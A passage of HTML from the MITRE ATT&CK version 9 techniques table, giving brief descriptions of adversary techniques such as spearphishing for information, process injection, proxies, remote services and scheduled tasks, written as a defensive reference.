href="/versions/v9/techniques/T1598/001"> Spearphishing Service </a> </td> <td> Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: <a href="/versions/v9/techniques/T1585">Establish Accounts</a> or <a href="/versions/v9/techniques/T1586">Compromise Accounts</a>) and/or sending multiple, seemingly urgent messages. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1598/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1598/002"> Spearphishing Attachment </a> </td> <td> Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: <a href="/versions/v9/techniques/T1585">Establish Accounts</a> or <a href="/versions/v9/techniques/T1586">Compromise Accounts</a>) and/or sending multiple, seemingly urgent messages. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1598/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1598/003"> Spearphishing Link </a> </td> <td> Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: <a href="/versions/v9/techniques/T1585">Establish Accounts</a> or <a href="/versions/v9/techniques/T1586">Compromise Accounts</a>) and/or sending multiple, seemingly urgent messages. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1542"> T1542 </a> </td> <td> <a href="/versions/v9/techniques/T1542"> Pre-OS Boot </a> </td> <td> Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1542/001"> System Firmware </a> </td> <td> Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1542/002"> Component Firmware </a> </td> <td> Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to <a href="/versions/v9/techniques/T1542/001">System Firmware</a> but conducted upon other system components/devices that may not have the same capability or level of integrity checking. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1542/003"> Bootkit </a> </td> <td> Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1542/004"> ROMMONkit </a> </td> <td> Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1542/005"> TFTP Boot </a> </td> <td> Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1057"> T1057 </a> </td> <td> <a href="/versions/v9/techniques/T1057"> Process Discovery </a> </td> <td> Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from <a href="/versions/v9/techniques/T1057">Process Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1055"> T1055 </a> </td> <td> <a href="/versions/v9/techniques/T1055"> Process Injection </a> </td> <td> Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1055/001"> Dynamic-link Library Injection </a> </td> <td> Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1055/002"> Portable Executable Injection </a> </td> <td> Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1055/003"> Thread Execution Hijacking </a> </td> <td> Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1055/004"> Asynchronous Procedure Call </a> </td> <td> Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1055/005"> Thread Local Storage </a> </td> <td> Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1055/008"> Ptrace System Calls </a> </td> <td> Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1055/009"> Proc Memory </a> </td> <td> Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1055/011"> Extra Window Memory Injection </a> </td> <td> Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1055/012"> Process Hollowing </a> </td> <td> Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/013"> .013 </a> </td> <td> <a href="/versions/v9/techniques/T1055/013"> Process Doppelgänging </a> </td> <td> Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/014"> .014 </a> </td> <td> <a href="/versions/v9/techniques/T1055/014"> VDSO Hijacking </a> </td> <td> Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1572"> T1572 </a> </td> <td> <a href="/versions/v9/techniques/T1572"> Protocol Tunneling </a> </td> <td> Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1090"> T1090 </a> </td> <td> <a href="/versions/v9/techniques/T1090"> Proxy </a> </td> <td> Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including <a href="/versions/v9/software/S0040">HTRAN</a>, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1090/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1090/001"> Internal Proxy </a> </td> <td> Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including <a href="/versions/v9/software/S0040">HTRAN</a>, ZXProxy, and ZXPortMap. Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1090/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1090/002"> External Proxy </a> </td> <td> Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including <a href="/versions/v9/software/S0040">HTRAN</a>, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1090/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1090/003"> Multi-hop Proxy </a> </td> <td> To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1090/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1090/004"> Domain Fronting </a> </td> <td> Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1012"> T1012 </a> </td> <td> <a href="/versions/v9/techniques/T1012"> Query Registry </a> </td> <td> Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1219"> T1219 </a> </td> <td> <a href="/versions/v9/techniques/T1219"> Remote Access Software </a> </td> <td> An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1563"> T1563 </a> </td> <td> <a href="/versions/v9/techniques/T1563"> Remote Service Session Hijacking </a> </td> <td> Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1563/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1563/001"> SSH Hijacking </a> </td> <td> Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1563/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1563/002"> RDP Hijacking </a> </td> <td> Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1021"> T1021 </a> </td> <td> <a href="/versions/v9/techniques/T1021"> Remote Services </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1021/001"> Remote Desktop Protocol </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1021/002"> SMB/Windows Admin Shares </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1021/003"> Distributed Component Object Model </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1021/004"> SSH </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1021/005"> VNC </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1021/006"> Windows Remote Management </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1018"> T1018 </a> </td> <td> <a href="/versions/v9/techniques/T1018"> Remote System Discovery </a> </td> <td> Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as <a href="/versions/v9/software/S0097">Ping</a> or <code>net view</code> using <a href="/versions/v9/software/S0039">Net</a>. Adversaries may also use local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) in order to discover the hostname to IP address mappings of remote systems. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1091"> T1091 </a> </td> <td> <a href="/versions/v9/techniques/T1091"> Replication Through Removable Media </a> </td> <td> Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1496"> T1496 </a> </td> <td> <a href="/versions/v9/techniques/T1496"> Resource Hijacking </a> </td> <td> Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1207"> T1207 </a> </td> <td> <a href="/versions/v9/techniques/T1207"> Rogue Domain Controller </a> </td> <td> Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1014"> T1014 </a> </td> <td> <a href="/versions/v9/techniques/T1014"> Rootkit </a> </td> <td> Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1053"> T1053 </a> </td> <td> <a href="/versions/v9/techniques/T1053"> Scheduled Task/Job </a> </td> <td> Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1053/001"> At (Linux) </a> </td> <td> Adversaries may abuse the <a href="/versions/v9/software/S0110">at</a> utility to perform task scheduling for initial or recurring execution of malicious code. The <a href="/versions/v9/software/S0110">at</a> command within Linux operating systems enables administrators to schedule tasks. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1053/002"> At (Windows) </a> </td> <td> Adversaries may abuse the <code>at.exe</code> utility to perform task scheduling for initial or recurring execution of malicious code. The <a href="/versions/v9/software/S0110">at</a> utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using <a href="/versions/v9/software/S0110">at</a> requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1053/003"> Cron </a> </td> <td> Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code. The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1053/004"> Launchd </a> </td> <td> Adversaries may abuse the <code>Launchd</code> daemon to perform task scheduling for initial or recurring execution of malicious code. The <code>launchd</code> daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> . These LaunchDaemons have property list files which point to the executables that will be launched . </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1053/005"> Scheduled Task </a> </td> <td> Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The <code>schtasks</code> can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1053/006"> Systemd Timers </a> </td> <td> Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to <a href="/versions/v9/techniques/T1053/003">Cron</a> in Linux environments. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1053/007"> Container Orchestration Job </a> </td> <td> Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1029"> T1029 </a> </td> <td> <a href="/versions/v9/techniques/T1029"> Scheduled Transfer </a> </td> <td> Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1113"> T1113 </a> </td> <td> <a href="/versions/v9/techniques/T1113"> Screen Capture </a> </td> <td> Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1597"> T1597 </a> </td> <td> <a href="/versions/v9/techniques/T1597"> Search Closed Sources </a> </td> <td> Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1597/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1597/001"> Threat Intel Vendors </a> </td> <td> Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1597/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1597/002"> Purchase Technical Data </a> </td> <td> Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1596"> T1596 </a> </td> <td> <a href="/versions/v9/techniques/T1596"> Search Open Technical Databases </a> </td> <td> Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1596/001"> DNS/Passive DNS </a> </td> <td> Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1596/002"> WHOIS </a> </td> <td> Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1596/003"> Digital Certificates </a> </td> <td> Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1596/004"> CDNs </a> </td> <td> Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1596/005"> Scan Databases </a> </td> <td> Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1593"> T1593 </a> </td> <td> <a href="/versions/v9/techniques/T1593"> Search Open Websites/Domains </a> </td> <td> Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1593/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1593/001"> Social Media </a> </td> <td> Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1593/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1593/002"> Search Engines </a> </td> <td> Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1594"> T1594 </a> </td> <td> <a href="/versions/v9/techniques/T1594"> Search Victim-Owned Websites </a> </td> <td> Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: <a href="/versions/v9/techniques/T1589/002">Email Addresses</a>). These sites may also have details highlighting business operations and relationships. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1505"> T1505 </a> </td> <td> <a href="/versions/v9/techniques/T1505"> Server Software Component </a> </td> <td> Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1505/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1505/001"> SQL Stored Procedures </a> </td> <td> Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1505/002"> .002 </a> </td> <td> 